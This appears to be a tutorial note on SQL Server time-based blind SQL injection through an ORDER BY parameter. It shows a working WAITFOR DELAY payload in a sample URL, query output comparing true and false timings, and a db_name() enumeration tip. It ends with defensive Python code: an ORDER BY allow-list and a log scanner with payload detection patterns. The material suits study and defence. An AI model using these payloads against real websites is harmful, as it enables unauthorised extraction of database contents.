0x01 Preface
This is basically the same as ordinary time-based (delay) injection.
Just note down the syntax.
0x02 Test data
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# Test table data: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x03 Example: guessing the database name
Note: changing the call to db_name(1) and so on displays the names of other databases.
For example:
Change it to db_name() to get the currently connected database
Change it to db_name(1) to get the database with ID 1
Change it to db_name(2) to get the database with ID 2
Web request: http://www.test.com/sql.php?orderby=id IF(db_name() like '%test%') waitfor delay '0:0:5' -- a
Database statement: select * from article order by id IF(db_name() like '%test%') waitfor delay '0:0:5' -- a
# Case where the condition is true (the response is delayed)
1> SELECT
*
FROM
article
ORDER BY
id
IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected) (5.064 sec)
# Case where the condition is false (no delay)
1> SELECT
*
FROM
article
ORDER BY
id
IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected) (0.064 sec)
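A defensive counterpart to the payload above, added here as an example and not part of the original post: it assumes the handler behind sql.php sorts the article table by a user-supplied column name (ORDER BY cannot be bound as a parameter, so it is fixed with an allow-list), and it flags the same payload shape in web access log lines. The log format, the sample lines and the function names are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumption: the handler behind sql.php sorts the "article" table by a
# user-supplied column name. ORDER BY cannot take a bound parameter, so the
# safe construction is an allow-list of column names; anything else is rejected.
ALLOWED_ORDER_COLUMNS = {"id", "title", "content"}

def build_article_query(orderby):
    """Return the query for a known column, or raise ValueError on anything else."""
    column = orderby.strip().lower()
    if column not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("rejected orderby value: %r" % orderby)
    return "SELECT * FROM article ORDER BY " + column

# Shapes characteristic of the SQL Server time-based payloads shown on this page:
# a WAITFOR DELAY, or an IF(...) wrapped around db_name(). Case-insensitive.
DELAY_PATTERNS = [
    re.compile(r"waitfor\s+delay", re.I),
    re.compile(r"\bif\s*\(\s*db_name\s*\(", re.I),
]

def scan_access_line(line):
    """Flag one access-log line (constructed format: METHOD URL STATUS DURATION_MS)."""
    try:
        method, url, status, duration_ms = line.split()
    except ValueError:
        return None  # not a line in the constructed format
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            # parse_qs decodes once; decoding again also catches double-encoded payloads
            decoded = unquote_plus(value)
            if any(p.search(decoded) for p in DELAY_PATTERNS):
                return {"param": name, "payload": decoded, "duration_ms": int(duration_ms)}
    return None

def scan_log(lines):
    """Return a finding for every line carrying a delay payload."""
    return [f for f in map(scan_access_line, lines) if f]

# Constructed sample log; the response times mirror the 5.064 s / 0.064 s seen above.
SAMPLE_LOG = [
    "GET /sql.php?orderby=id 200 64",
    "GET /sql.php?orderby=id%20IF(db_name()%20like%20'%25test%25')%20waitfor%20delay%20'0:0:5'%20--%20a 200 5064",
    "GET /sql.php?orderby=title 200 58",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The flagged line pairs a delay pattern with a roughly five-second response time, which is the signal to alert on rather than the pattern alone.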